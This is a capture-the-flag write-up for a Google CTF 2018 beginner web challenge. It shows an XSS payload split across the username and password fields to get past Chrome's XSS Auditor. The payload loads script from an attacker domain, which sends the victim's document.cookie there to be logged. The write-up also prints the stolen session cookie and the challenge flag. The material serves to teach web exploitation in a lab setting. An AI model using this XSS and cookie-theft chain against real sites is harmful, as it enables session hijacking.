Rating: 5.0
It was really easy to find out that we can inject XSS payload in username and password, however it was much harder to bypass XSS Auditor.
I tried a lot of payloads (either my own or copied from the Internet), but it didn't work.
There was only one strange thing about this website. Our username and password were separated by two slashes.
It looks as if it was part of url scheme. If type first half of our payload as nickname and the second part as the password hopefully it will work.
```
login:<script src=https:
password:[YOURDOMAIN]/exploit.js></script>
```
The above payload finally executed JS in chrome (I tried also with SVG and other tags, but I had some problems with them).
`exploit.js` simply redirects the browser to our website and passes document.cookie as query string.
`log.php` function saves all request uris to file.
We can only login via POST, so we need to create the website which will automaticly submit the form [website.html](https://github.com/BOAKGP/CTF-Writeups/blob/master/Google%20CTF%202018%20Quals%20Beginners%20Quest/Router%20UI/website.html).
We have to send link to this website via email to wintermuted. He'll almost immediately visit it and we'll get his cookie.
Please note that you'll need HTTPS server for this challenge (you can use let's encrypt certificate). I tried with plain HTTP, but browser refused to execute it.
When we open log.txt on our server (hopefully) we'll see:
```
/log.php?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja
```
Set this cookie in your browser and visit https://router-ui.web.ctfcompetition.com/.
In the source you can find the flag.
Flag: `CTF{Kao4pheitot7Ahmu}`
